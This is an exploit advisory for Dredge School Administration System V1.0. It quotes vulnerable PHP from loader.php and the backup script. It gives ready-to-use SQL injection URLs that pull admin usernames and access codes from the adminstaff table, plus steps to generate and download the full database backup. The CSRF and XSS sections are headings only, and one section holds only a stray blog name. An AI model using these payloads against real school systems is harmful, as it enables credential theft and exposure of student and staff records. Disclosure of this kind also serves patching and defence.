Dredge School Administration System V1.0 - Multiple Vulnerabilties
====================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/studentrecord/
####################################################################
I. Sql Injection
######################################
VULNERABILITY: CLASSIC MYSQL INJECTION
######################################
/loader.php (LINE: 10-17)
-----------------------------------------------------------------------------
$searchwords = $_GET['load'];
$searchwords = stripslashes($searchwords);
$searchwords = strip_tags($searchwords);
$searchwords = trim($searchwords, "'");
$load = $_GET['load'];
mysql_select_db($database_drsa, $drsa);
$query_file = "SELECT * FROM system WHERE system_name = '$searchwords'";
$file = mysql_query($query_file, $drsa);
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
http://localhost/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff
http://localhost/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff
http://localhost/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff
ETC.......
II. Backup Download
##############
VULNERABILITY
##############
/Backup/processbackup.php (LINE: 89-93)
-----------------------------------------------------------------------------
//save file
// $handle =
fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
$handle = fopen('RecordManager.sql','w+');
fwrite($handle,$return);
fclose($handle);
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
1. Open http://localhost/DSM/Backup/processbackup.php
2. When you open the link produces RecordManager.sql
3. to download backup [http://localhost/DSM/Backup/RecordManager.sql]
III. Accounts Disclosure
Iphobos Blog
IV. Cross Site Request Forgery
[Change Password & Email Admin]
V. Cross Site Scripting
[CSRF with XSS Exploit]
####################################################################
####################################################################